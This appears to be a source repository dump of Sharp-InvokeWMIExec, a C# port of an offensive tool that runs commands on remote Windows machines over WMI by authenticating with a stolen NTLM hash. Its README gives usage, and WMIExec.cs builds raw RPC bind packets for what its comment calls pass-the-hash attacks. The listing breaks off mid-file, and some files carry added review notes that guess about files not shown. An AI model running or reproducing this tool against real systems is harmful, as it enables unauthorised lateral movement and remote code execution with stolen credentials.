├── Sharp-InvokeWMIExec
├── App.config
├── Properties
│ └── AssemblyInfo.cs
├── ArgParse.cs
├── Utilities.cs
├── Sharp-InvokeWMIExec.csproj
├── WMIExec.cs
└── Program.cs
├── Sharp-InvokeWMIExec.sln
├── README.md
├── .gitattributes
└── .gitignore
/Sharp-InvokeWMIExec/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
--------------------------------------------------------------------------------
/Sharp-InvokeWMIExec.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 14
4 | VisualStudioVersion = 14.0.25420.1
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Sharp-InvokeWMIExec", "Sharp-InvokeWMIExec\Sharp-InvokeWMIExec.csproj", "{0A63B0A1-7D1A-4B84-81C3-BBBFE9913029}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Release|Any CPU = Release|Any CPU
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {0A63B0A1-7D1A-4B84-81C3-BBBFE9913029}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | {0A63B0A1-7D1A-4B84-81C3-BBBFE9913029}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | {0A63B0A1-7D1A-4B84-81C3-BBBFE9913029}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | {0A63B0A1-7D1A-4B84-81C3-BBBFE9913029}.Release|Any CPU.Build.0 = Release|Any CPU
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | EndGlobal
23 |
--------------------------------------------------------------------------------
/Sharp-InvokeWMIExec/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("Sharp-InvokeWMIExec")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("Sharp-InvokeWMIExec")]
13 | [assembly: AssemblyCopyright("Copyright © 2018")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("0a63b0a1-7d1a-4b84-81c3-bbbfe9913029")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # SharpInvoke-WMIExec
2 | A native C# conversion of Kevin Robertson's Invoke-SMBExec PowerShell script. (https://github.com/Kevin-Robertson/Invoke-TheHash/blob/master/Invoke-WMIExec.ps1)
3 |
4 | Built for .NET 3.5
5 |
6 | # Usage
7 | Sharp-WMIExec.exe hash: username: domain: target: command:
8 |
9 | # Description
10 | This Assembly will allow you to execute a command on a target machine using WMI by providing an NTLM hash for the specified user.
11 |
12 | # Help
13 | ```
14 | Option Description
15 | username* Username to use for authentication
16 | hash* NTLM Password hash for authentication. This module will accept either LM:NTLM or NTLM format
17 | domain Domain to use for authentication. This parameter is not needed with local accounts or when using @domain after the username
18 | target Hostname or IP Address of the target.
19 | command Command to execute on the target. If a command is not specified, the function will check to see if the username and hash provide local admin access on the target
20 | -CheckAdmin Check admin access only, don't execute command
21 | -Help (-h) Switch, Enabled debugging [Default='False']
22 | -Debug Print Debugging Information along with output
23 | ```
24 |
--------------------------------------------------------------------------------
/Sharp-InvokeWMIExec/ArgParse.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Text;
5 |
6 | namespace Sharp_InvokeWMIExec
7 | {
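public static class ArgParse
{
    // Argument parsing class from Rubeus (https://github.com/GhostPack/Rubeus/)
    // Author: @Harmj0y

    /// <summary>
    /// Turns raw command-line tokens into a key/value dictionary.
    /// A "key:value" token is stored under its lower-cased key (the value keeps its case);
    /// the switches -debug, -h / -help and -checkadmin set the "debugging", "showhelp" and
    /// "admincheck" keys to "true"; any other token is stored verbatim with an empty value.
    /// A key given more than once keeps the last value.
    /// </summary>
    /// <param name="args">Command-line tokens, e.g. the argument of Main(string[]).</param>
    /// <returns>
    /// A successful <see cref="ArgumentParserResult"/> carrying the dictionary, or a failed one
    /// (the exception message is written to the console) when a token cannot be processed.
    /// </returns>
    public static ArgumentParserResult Parse(IEnumerable<string> args)
    {
        var arguments = new Dictionary<string, string>();
        try
        {
            if (args == null)
            {
                // Caught below and reported like any other parse failure, as the original did for a null sequence.
                throw new ArgumentNullException(nameof(args));
            }

            foreach (var argument in args)
            {
                var idx = argument.IndexOf(':');
                if (idx > 0)
                {
                    // Keys are looked up by their lower-cased form downstream, so normalise with the
                    // invariant culture: ToLower() follows the process culture (e.g. Turkish dotless i)
                    // and can silently yield a key that never matches.
                    arguments[argument.Substring(0, idx).ToLowerInvariant()] = argument.Substring(idx + 1);
                }
                else if (IsSwitch(argument, "-debug"))
                {
                    arguments["debugging"] = "true";
                }
                else if (IsSwitch(argument, "-h") || IsSwitch(argument, "-help"))
                {
                    arguments["showhelp"] = "true";
                }
                else if (IsSwitch(argument, "-checkadmin"))
                {
                    arguments["admincheck"] = "true";
                }
                else
                {
                    arguments[argument] = string.Empty;
                }
            }

            return ArgumentParserResult.Success(arguments);
        }
        catch (System.Exception ex)
        {
            Console.WriteLine(ex.Message);
            return ArgumentParserResult.Failure();
        }
    }

    // Case-insensitive, culture-independent comparison of a token against a switch name.
    private static bool IsSwitch(string argument, string name)
    {
        return string.Equals(argument, name, StringComparison.OrdinalIgnoreCase);
    }
}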
public class ArgumentParserResult
{
    /// <summary>True when the command line was parsed without error.</summary>
    public bool ParsedOk { get; }

    /// <summary>The parsed key/value pairs; null for a failed result.</summary>
    public Dictionary<string, string> Arguments { get; }

    private ArgumentParserResult(bool parsedOk, Dictionary<string, string> arguments)
    {
        ParsedOk = parsedOk;
        Arguments = arguments;
    }

    /// <summary>Wraps a parsed dictionary in a successful result.</summary>
    public static ArgumentParserResult Success(Dictionary<string, string> arguments)
    {
        var result = new ArgumentParserResult(true, arguments);
        return result;
    }

    /// <summary>Creates a failed result; its Arguments property is null.</summary>
    public static ArgumentParserResult Failure()
    {
        var result = new ArgumentParserResult(false, null);
        return result;
    }
}
62 | }
63 |
--------------------------------------------------------------------------------
/.gitattributes:
--------------------------------------------------------------------------------
1 | ###############################################################################
2 | # Set default behavior to automatically normalize line endings.
3 | ###############################################################################
4 | * text=auto
5 |
6 | ###############################################################################
7 | # Set default behavior for command prompt diff.
8 | #
9 | # This is need for earlier builds of msysgit that does not have it on by
10 | # default for csharp files.
11 | # Note: This is only used by command line
12 | ###############################################################################
13 | #*.cs diff=csharp
14 |
15 | ###############################################################################
16 | # Set the merge driver for project and solution files
17 | #
18 | # Merging from the command prompt will add diff markers to the files if there
19 | # are conflicts (Merging from VS is not affected by the settings below, in VS
20 | # the diff markers are never inserted). Diff markers may cause the following
21 | # file extensions to fail to load in VS. An alternative would be to treat
22 | # these files as binary and thus will always conflict and require user
23 | # intervention with every merge. To do so, just uncomment the entries below
24 | ###############################################################################
25 | #*.sln merge=binary
26 | #*.csproj merge=binary
27 | #*.vbproj merge=binary
28 | #*.vcxproj merge=binary
29 | #*.vcproj merge=binary
30 | #*.dbproj merge=binary
31 | #*.fsproj merge=binary
32 | #*.lsproj merge=binary
33 | #*.wixproj merge=binary
34 | #*.modelproj merge=binary
35 | #*.sqlproj merge=binary
36 | #*.wwaproj merge=binary
37 |
38 | ###############################################################################
39 | # behavior for image files
40 | #
41 | # image files are treated as binary by default.
42 | ###############################################################################
43 | #*.jpg binary
44 | #*.png binary
45 | #*.gif binary
46 |
47 | ###############################################################################
48 | # diff behavior for common document formats
49 | #
50 | # Convert binary document formats to text before diffing them. This feature
51 | # is only available from the command line. Turn it on by uncommenting the
52 | # entries below.
53 | ###############################################################################
54 | #*.doc diff=astextplain
55 | #*.DOC diff=astextplain
56 | #*.docx diff=astextplain
57 | #*.DOCX diff=astextplain
58 | #*.dot diff=astextplain
59 | #*.DOT diff=astextplain
60 | #*.pdf diff=astextplain
61 | #*.PDF diff=astextplain
62 | #*.rtf diff=astextplain
63 | #*.RTF diff=astextplain
64 |
--------------------------------------------------------------------------------
/Sharp-InvokeWMIExec/Utilities.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections;
3 | using System.Collections.Generic;
4 | using System.Collections.Specialized;
5 | using System.Linq;
6 | using System.Net.Sockets;
7 | using System.Text;
8 |
9 | namespace Sharp_InvokeWMIExec
10 | {
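class Utilities
{
    /// <summary>
    /// Returns the inclusive slice array[start..end]. Like the LINQ pipeline it is built
    /// from, a range that runs past the end of the array is truncated rather than thrown.
    /// </summary>
    /// <param name="array">Source bytes.</param>
    /// <param name="start">Index of the first byte to copy.</param>
    /// <param name="end">Index of the last byte to copy (inclusive).</param>
    /// <returns>A new array with the selected bytes (possibly shorter than requested).</returns>
    /// <exception cref="ArgumentNullException">array is null.</exception>
    public static byte[] GetByteRange(byte[] array, int start, int end)
    {
        if (array == null)
        {
            throw new ArgumentNullException(nameof(array));
        }
        return array.Skip(start).Take(end - start + 1).ToArray();
    }

    /// <summary>Concatenates a followed by b into a new array.</summary>
    /// <exception cref="ArgumentNullException">Either input is null.</exception>
    public static byte[] CombineByteArray(byte[] a, byte[] b)
    {
        if (a == null)
        {
            throw new ArgumentNullException(nameof(a));
        }
        if (b == null)
        {
            throw new ArgumentNullException(nameof(b));
        }
        byte[] combined = new byte[a.Length + b.Length];
        Buffer.BlockCopy(a, 0, combined, 0, a.Length);
        Buffer.BlockCopy(b, 0, combined, a.Length, b.Length);
        return combined;
    }

    /// <summary>
    /// Decodes a hex string ("0aff" or "0AFF", no separators) into bytes, two characters per byte.
    /// Presumably this is where the command-line hash argument is decoded (Program.cs is not in
    /// view), so malformed input is rejected with a descriptive exception instead of an index error.
    /// </summary>
    /// <exception cref="ArgumentNullException">hex is null.</exception>
    /// <exception cref="ArgumentException">hex has an odd number of characters.</exception>
    /// <exception cref="FormatException">hex contains a non-hex character.</exception>
    public static byte[] StringToByteArray(string hex)
    {
        if (hex == null)
        {
            throw new ArgumentNullException(nameof(hex));
        }
        if (hex.Length % 2 != 0)
        {
            throw new ArgumentException("Hex string must contain an even number of characters.", nameof(hex));
        }
        byte[] bytes = new byte[hex.Length / 2];
        for (int i = 0; i < bytes.Length; i++)
        {
            // Convert.ToByte(_, 16) throws FormatException on a non-hex digit.
            bytes[i] = Convert.ToByte(hex.Substring(i * 2, 2), 16);
        }
        return bytes;
    }

    /// <summary>
    /// Flattens the values of a packet dictionary (each a byte[]) into one array, in insertion order.
    /// </summary>
    /// <exception cref="ArgumentNullException">packet_ordered_dictionary is null.</exception>
    /// <exception cref="InvalidOperationException">A value is not a byte[] (previously a NullReferenceException deep inside LINQ).</exception>
    public static byte[] ConvertFromPacketOrderedDictionary(OrderedDictionary packet_ordered_dictionary)
    {
        if (packet_ordered_dictionary == null)
        {
            throw new ArgumentNullException(nameof(packet_ordered_dictionary));
        }

        var chunks = new List<byte[]>(packet_ordered_dictionary.Count);
        int totalLength = 0;
        foreach (DictionaryEntry entry in packet_ordered_dictionary)
        {
            var chunk = entry.Value as byte[];
            if (chunk == null)
            {
                throw new InvalidOperationException("Packet field '" + entry.Key + "' is not a byte[].");
            }
            chunks.Add(chunk);
            totalLength += chunk.Length;
        }

        // Single allocation of the final size instead of SelectMany/ToArray growing a list.
        byte[] flattened = new byte[totalLength];
        int offset = 0;
        foreach (var chunk in chunks)
        {
            Buffer.BlockCopy(chunk, 0, flattened, offset, chunk.Length);
            offset += chunk.Length;
        }
        return flattened;
    }

    /// <summary>
    /// Reads the 16-bit length field stored at string_extract_data[length_start] and [length_start + 1],
    /// in host byte order (little-endian on x86/x64, the same interpretation BitConverter gave before).
    /// </summary>
    /// <exception cref="ArgumentNullException">string_extract_data is null.</exception>
    /// <exception cref="ArgumentException">Fewer than two bytes are available at length_start.</exception>
    public static ushort DataLength(int length_start, byte[] string_extract_data)
    {
        if (string_extract_data == null)
        {
            throw new ArgumentNullException(nameof(string_extract_data));
        }
        return BitConverter.ToUInt16(string_extract_data, length_start);
    }

    /// <summary>Alias of <see cref="StringToByteArray"/>; kept because callers use both names.</summary>
    public static byte[] ConvertStringToByteArray(string hex)
    {
        return StringToByteArray(hex);
    }

    /// <summary>
    /// Writes BytesToSend to the stream, flushes, then performs one blocking Read into a fresh
    /// 2048-byte buffer and returns that whole buffer.
    /// </summary>
    /// <remarks>
    /// The number of bytes actually read is not propagated: everything past it stays zero, and a
    /// reply longer than 2048 bytes is left unread on the stream. NOTE(review): a short or empty
    /// read (e.g. the peer closing the connection) is therefore indistinguishable from a genuine
    /// run of zero bytes. The fixed-size contract is kept because callers (Program.cs, not in view)
    /// may index fixed offsets into it; the read count should be surfaced before any field is trusted.
    /// </remarks>
    /// <exception cref="ArgumentNullException">stream or BytesToSend is null.</exception>
    public static byte[] SendStream(NetworkStream stream, byte[] BytesToSend)
    {
        if (stream == null)
        {
            throw new ArgumentNullException(nameof(stream));
        }
        if (BytesToSend == null)
        {
            throw new ArgumentNullException(nameof(BytesToSend));
        }
        byte[] bytesReceived = new byte[2048];
        stream.Write(BytesToSend, 0, BytesToSend.Length);
        stream.Flush();
        stream.Read(bytesReceived, 0, bytesReceived.Length);
        return bytesReceived;
    }
}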
69 | }
70 |
--------------------------------------------------------------------------------
/Sharp-InvokeWMIExec/Sharp-InvokeWMIExec.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {0A63B0A1-7D1A-4B84-81C3-BBBFE9913029}
8 | Exe
9 | Properties
10 | Sharp_InvokeWMIExec
11 | Sharp-WMIExec
12 | v3.5
13 | 512
14 | true
15 |
16 |
17 |
18 | AnyCPU
19 | true
20 | full
21 | false
22 | bin\Debug\
23 | DEBUG;TRACE
24 | prompt
25 | 4
26 | false
27 |
28 |
29 | AnyCPU
30 | pdbonly
31 | true
32 | bin\Release\
33 | TRACE
34 | prompt
35 | 4
36 | false
37 |
38 |
39 |
40 | ..\packages\Mono.Options.5.3.0.1\lib\net4-client\Mono.Options.dll
41 |
42 |
43 | ..\packages\PowerArgs.Dev.2.7.1.0\lib\net45\PowerArgs.dll
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
72 |
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | ## Ignore Visual Studio temporary files, build results, and
2 | ## files generated by popular Visual Studio add-ons.
3 |
4 | # User-specific files
5 | *.suo
6 | *.user
7 | *.userosscache
8 | *.sln.docstates
9 |
10 | # User-specific files (MonoDevelop/Xamarin Studio)
11 | *.userprefs
12 |
13 | # Build results
14 | [Dd]ebug/
15 | [Dd]ebugPublic/
16 | [Rr]elease/
17 | [Rr]eleases/
18 | [Xx]64/
19 | [Xx]86/
20 | [Bb]uild/
21 | bld/
22 | [Bb]in/
23 | [Oo]bj/
24 |
25 | # Visual Studio 2015 cache/options directory
26 | .vs/
27 | # Uncomment if you have tasks that create the project's static files in wwwroot
28 | #wwwroot/
29 |
30 | # MSTest test Results
31 | [Tt]est[Rr]esult*/
32 | [Bb]uild[Ll]og.*
33 |
34 | # NUNIT
35 | *.VisualState.xml
36 | TestResult.xml
37 |
38 | # Build Results of an ATL Project
39 | [Dd]ebugPS/
40 | [Rr]eleasePS/
41 | dlldata.c
42 |
43 | # DNX
44 | project.lock.json
45 | artifacts/
46 |
47 | *_i.c
48 | *_p.c
49 | *_i.h
50 | *.ilk
51 | *.meta
52 | *.obj
53 | *.pch
54 | *.pdb
55 | *.pgc
56 | *.pgd
57 | *.rsp
58 | *.sbr
59 | *.tlb
60 | *.tli
61 | *.tlh
62 | *.tmp
63 | *.tmp_proj
64 | *.log
65 | *.vspscc
66 | *.vssscc
67 | .builds
68 | *.pidb
69 | *.svclog
70 | *.scc
71 |
72 | # Chutzpah Test files
73 | _Chutzpah*
74 |
75 | # Visual C++ cache files
76 | ipch/
77 | *.aps
78 | *.ncb
79 | *.opendb
80 | *.opensdf
81 | *.sdf
82 | *.cachefile
83 | *.VC.db
84 |
85 | # Visual Studio profiler
86 | *.psess
87 | *.vsp
88 | *.vspx
89 | *.sap
90 |
91 | # TFS 2012 Local Workspace
92 | $tf/
93 |
94 | # Guidance Automation Toolkit
95 | *.gpState
96 |
97 | # ReSharper is a .NET coding add-in
98 | _ReSharper*/
99 | *.[Rr]e[Ss]harper
100 | *.DotSettings.user
101 |
102 | # JustCode is a .NET coding add-in
103 | .JustCode
104 |
105 | # TeamCity is a build add-in
106 | _TeamCity*
107 |
108 | # DotCover is a Code Coverage Tool
109 | *.dotCover
110 |
111 | # NCrunch
112 | _NCrunch_*
113 | .*crunch*.local.xml
114 | nCrunchTemp_*
115 |
116 | # MightyMoose
117 | *.mm.*
118 | AutoTest.Net/
119 |
120 | # Web workbench (sass)
121 | .sass-cache/
122 |
123 | # Installshield output folder
124 | [Ee]xpress/
125 |
126 | # DocProject is a documentation generator add-in
127 | DocProject/buildhelp/
128 | DocProject/Help/*.HxT
129 | DocProject/Help/*.HxC
130 | DocProject/Help/*.hhc
131 | DocProject/Help/*.hhk
132 | DocProject/Help/*.hhp
133 | DocProject/Help/Html2
134 | DocProject/Help/html
135 |
136 | # Click-Once directory
137 | publish/
138 |
139 | # Publish Web Output
140 | *.[Pp]ublish.xml
141 | *.azurePubxml
142 |
143 | # TODO: Un-comment the next line if you do not want to checkin
144 | # your web deploy settings because they may include unencrypted
145 | # passwords
146 | #*.pubxml
147 | *.publishproj
148 |
149 | # NuGet Packages
150 | *.nupkg
151 | # The packages folder can be ignored because of Package Restore
152 | **/packages/*
153 | # except build/, which is used as an MSBuild target.
154 | !**/packages/build/
155 | # Uncomment if necessary however generally it will be regenerated when needed
156 | #!**/packages/repositories.config
157 | # NuGet v3's project.json files produces more ignoreable files
158 | *.nuget.props
159 | *.nuget.targets
160 |
161 | # Microsoft Azure Build Output
162 | csx/
163 | *.build.csdef
164 |
165 | # Microsoft Azure Emulator
166 | ecf/
167 | rcf/
168 |
169 | # Microsoft Azure ApplicationInsights config file
170 | ApplicationInsights.config
171 |
172 | # Windows Store app package directory
173 | AppPackages/
174 | BundleArtifacts/
175 |
176 | # Visual Studio cache files
177 | # files ending in .cache can be ignored
178 | *.[Cc]ache
179 | # but keep track of directories ending in .cache
180 | !*.[Cc]ache/
181 |
182 | # Others
183 | ClientBin/
184 | [Ss]tyle[Cc]op.*
185 | ~$*
186 | *~
187 | *.dbmdl
188 | *.dbproj.schemaview
189 | *.pfx
190 | *.publishsettings
191 | node_modules/
192 | orleans.codegen.cs
193 |
194 | # RIA/Silverlight projects
195 | Generated_Code/
196 |
197 | # Backup & report files from converting an old project file
198 | # to a newer Visual Studio version. Backup files are not needed,
199 | # because we have git ;-)
200 | _UpgradeReport_Files/
201 | Backup*/
202 | UpgradeLog*.XML
203 | UpgradeLog*.htm
204 |
205 | # SQL Server files
206 | *.mdf
207 | *.ldf
208 |
209 | # Business Intelligence projects
210 | *.rdl.data
211 | *.bim.layout
212 | *.bim_*.settings
213 |
214 | # Microsoft Fakes
215 | FakesAssemblies/
216 |
217 | # GhostDoc plugin setting file
218 | *.GhostDoc.xml
219 |
220 | # Node.js Tools for Visual Studio
221 | .ntvs_analysis.dat
222 |
223 | # Visual Studio 6 build log
224 | *.plg
225 |
226 | # Visual Studio 6 workspace options file
227 | *.opt
228 |
229 | # Visual Studio LightSwitch build output
230 | **/*.HTMLClient/GeneratedArtifacts
231 | **/*.DesktopClient/GeneratedArtifacts
232 | **/*.DesktopClient/ModelManifest.xml
233 | **/*.Server/GeneratedArtifacts
234 | **/*.Server/ModelManifest.xml
235 | _Pvt_Extensions
236 |
237 | # LightSwitch generated files
238 | GeneratedArtifacts/
239 | ModelManifest.xml
240 |
241 | # Paket dependency manager
242 | .paket/paket.exe
243 |
244 | # FAKE - F# Make
245 | .fake/
--------------------------------------------------------------------------------
/Sharp-InvokeWMIExec/WMIExec.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Collections.Specialized;
4 | using System.Linq;
5 | using System.Text;
6 |
7 | namespace Sharp_InvokeWMIExec
8 | {
9 | public class WMIExec
10 | {
11 | ///
12 | /// WMIExec contains all of the functions used to manually create SMB Packet Structures for Pass the Hash attacks.
13 | ///
14 | ///
15 | /// Based heavily on Kevin Robertson's Invoke-TheHash toolset (found
16 | /// at https://github.com/Kevin-Robertson/Invoke-TheHash)
17 | ///
18 |
/// <summary>
/// Builds the RPC bind PDU as an ordered list of named byte fields (flattened for the wire
/// by Utilities.ConvertFromPacketOrderedDictionary). The header and first presentation
/// context are always emitted; packet_num_ctx_items[0] == 2 or 3 appends the extra contexts,
/// the 3-context form also carrying the auth trailer (RPCBind_AuthType … RPCBind_OSVersion).
/// A call ID of 3 appends the same trailer with auth level 0x02.
/// </summary>
/// <param name="packet_call_ID">Call ID, written as 4 bytes in host byte order.</param>
/// <param name="packet_max_frag">Accepted but not used; MaxXmitFrag/MaxRecvFrag are the fixed bytes 0xb8,0x10.</param>
/// <param name="packet_num_ctx_items">Only the first byte is read (1, 2 or 3 contexts).</param>
/// <param name="packet_context_ID">Context ID bytes of the first context.</param>
/// <param name="packet_UUID">Interface UUID bytes of the first context.</param>
/// <param name="packet_UUID_version">Interface version bytes of the first context.</param>
/// <returns>The field dictionary in wire order.</returns>
/// <remarks>
/// NOTE(review): FragLength is the constant 0x48,0x00 regardless of how many contexts are
/// added, and OrderedDictionary.Add throws ArgumentException on a duplicate key, so the
/// 3-context branch combined with call ID 3 would throw (both add "RPCBind_AuthType",
/// "RPCBind_ContextID3", …). The callers in Program.cs are not in view; confirm they never
/// combine the two.
/// </remarks>
public static OrderedDictionary RPCBind(int packet_call_ID, byte[] packet_max_frag, byte[] packet_num_ctx_items, byte[] packet_context_ID, byte[] packet_UUID, byte[] packet_UUID_version)
{
    var bind = new OrderedDictionary();
    Action<string, byte[]> add = (key, value) => bind.Add(key, value);

    // Common header and first presentation context.
    add("RPCBind_Version", new byte[] { 0x05 });
    add("RPCBind_VersionMinor", new byte[] { 0x00 });
    add("RPCBind_PacketType", new byte[] { 0x0b });
    add("RPCBind_PacketFlags", new byte[] { 0x03 });
    add("RPCBind_DataRepresentation", new byte[] { 0x10, 0x00, 0x00, 0x00 });
    add("RPCBind_FragLength", new byte[] { 0x48, 0x00 });
    add("RPCBind_AuthLength", new byte[] { 0x00, 0x00 });
    add("RPCBind_CallID", BitConverter.GetBytes(packet_call_ID));
    add("RPCBind_MaxXmitFrag", new byte[] { 0xb8, 0x10 });
    add("RPCBind_MaxRecvFrag", new byte[] { 0xb8, 0x10 });
    add("RPCBind_AssocGroup", new byte[] { 0x00, 0x00, 0x00, 0x00 });
    add("RPCBind_NumCtxItems", packet_num_ctx_items);
    add("RPCBind_Unknown", new byte[] { 0x00, 0x00, 0x00 });
    add("RPCBind_ContextID", packet_context_ID);
    add("RPCBind_NumTransItems", new byte[] { 0x01 });
    add("RPCBind_Unknown2", new byte[] { 0x00 });
    add("RPCBind_Interface", packet_UUID);
    add("RPCBind_InterfaceVer", packet_UUID_version);
    add("RPCBind_InterfaceVerMinor", new byte[] { 0x00, 0x00 });
    add("RPCBind_TransferSyntax", new byte[] { 0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60 });
    add("RPCBind_TransferSyntaxVer", new byte[] { 0x02, 0x00, 0x00, 0x00 });

    // Additional presentation contexts, selected by the first byte only.
    switch (packet_num_ctx_items[0])
    {
        case 2:
            add("RPCBind_ContextID2", new byte[] { 0x01, 0x00 });
            add("RPCBind_NumTransItems2", new byte[] { 0x01 });
            add("RPCBind_Unknown3", new byte[] { 0x00 });
            add("RPCBind_Interface2", new byte[] { 0xc4, 0xfe, 0xfc, 0x99, 0x60, 0x52, 0x1b, 0x10, 0xbb, 0xcb, 0x00, 0xaa, 0x00, 0x21, 0x34, 0x7a });
            add("RPCBind_InterfaceVer2", new byte[] { 0x00, 0x00 });
            add("RPCBind_InterfaceVerMinor2", new byte[] { 0x00, 0x00 });
            add("RPCBind_TransferSyntax2", new byte[] { 0x2c, 0x1c, 0xb7, 0x6c, 0x12, 0x98, 0x40, 0x45, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
            add("RPCBind_TransferSyntaxVer2", new byte[] { 0x01, 0x00, 0x00, 0x00 });
            break;

        case 3:
            add("RPCBind_ContextID2", new byte[] { 0x01, 0x00 });
            add("RPCBind_NumTransItems2", new byte[] { 0x01 });
            add("RPCBind_Unknown3", new byte[] { 0x00 });
            add("RPCBind_Interface2", new byte[] { 0x43, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46 });
            add("RPCBind_InterfaceVer2", new byte[] { 0x00, 0x00 });
            add("RPCBind_InterfaceVerMinor2", new byte[] { 0x00, 0x00 });
            add("RPCBind_TransferSyntax2", new byte[] { 0x33, 0x05, 0x71, 0x71, 0xba, 0xbe, 0x37, 0x49, 0x83, 0x19, 0xb5, 0xdb, 0xef, 0x9c, 0xcc, 0x36 });
            add("RPCBind_TransferSyntaxVer2", new byte[] { 0x01, 0x00, 0x00, 0x00 });
            add("RPCBind_ContextID3", new byte[] { 0x02, 0x00 });
            add("RPCBind_NumTransItems3", new byte[] { 0x01 });
            add("RPCBind_Unknown4", new byte[] { 0x00 });
            add("RPCBind_Interface3", new byte[] { 0x43, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46 });
            add("RPCBind_InterfaceVer3", new byte[] { 0x00, 0x00 });
            add("RPCBind_InterfaceVerMinor3", new byte[] { 0x00, 0x00 });
            add("RPCBind_TransferSyntax3", new byte[] { 0x2c, 0x1c, 0xb7, 0x6c, 0x12, 0x98, 0x40, 0x45, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
            add("RPCBind_TransferSyntaxVer3", new byte[] { 0x01, 0x00, 0x00, 0x00 });
            // Auth trailer, level 0x04.
            add("RPCBind_AuthType", new byte[] { 0x0a });
            add("RPCBind_AuthLevel", new byte[] { 0x04 });
            add("RPCBind_AuthPadLength", new byte[] { 0x00 });
            add("RPCBind_AuthReserved", new byte[] { 0x00 });
            add("RPCBind_ContextID4", new byte[] { 0x00, 0x00, 0x00, 0x00 });
            add("RPCBind_Identifier", new byte[] { 0x4e, 0x54, 0x4c, 0x4d, 0x53, 0x53, 0x50, 0x00 });
            add("RPCBind_MessageType", new byte[] { 0x01, 0x00, 0x00, 0x00 });
            add("RPCBind_NegotiateFlags", new byte[] { 0x97, 0x82, 0x08, 0xe2 });
            add("RPCBind_CallingWorkstationDomain", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
            add("RPCBind_CallingWorkstationName", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
            add("RPCBind_OSVersion", new byte[] { 0x06, 0x01, 0xb1, 0x1d, 0x00, 0x00, 0x00, 0x0f });
            break;
    }

    // Auth trailer, level 0x02, keyed on the call ID.
    if (packet_call_ID == 3)
    {
        add("RPCBind_AuthType", new byte[] { 0x0a });
        add("RPCBind_AuthLevel", new byte[] { 0x02 });
        add("RPCBind_AuthPadLength", new byte[] { 0x00 });
        add("RPCBind_AuthReserved", new byte[] { 0x00 });
        add("RPCBind_ContextID3", new byte[] { 0x00, 0x00, 0x00, 0x00 });
        add("RPCBind_Identifier", new byte[] { 0x4e, 0x54, 0x4c, 0x4d, 0x53, 0x53, 0x50, 0x00 });
        add("RPCBind_MessageType", new byte[] { 0x01, 0x00, 0x00, 0x00 });
        add("RPCBind_NegotiateFlags", new byte[] { 0x97, 0x82, 0x08, 0xe2 });
        add("RPCBind_CallingWorkstationDomain", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
        add("RPCBind_CallingWorkstationName", new byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 });
        add("RPCBind_OSVersion", new byte[] { 0x06, 0x01, 0xb1, 0x1d, 0x00, 0x00, 0x00, 0x0f });
    }

    return bind;
}
/// <summary>
/// Builds the RPC auth3 PDU (packet type 0x10) that carries the supplied NTLMSSP blob.
/// AuthLength is the blob length and FragLength the blob length + 28, each truncated to
/// its low two bytes in host byte order.
/// </summary>
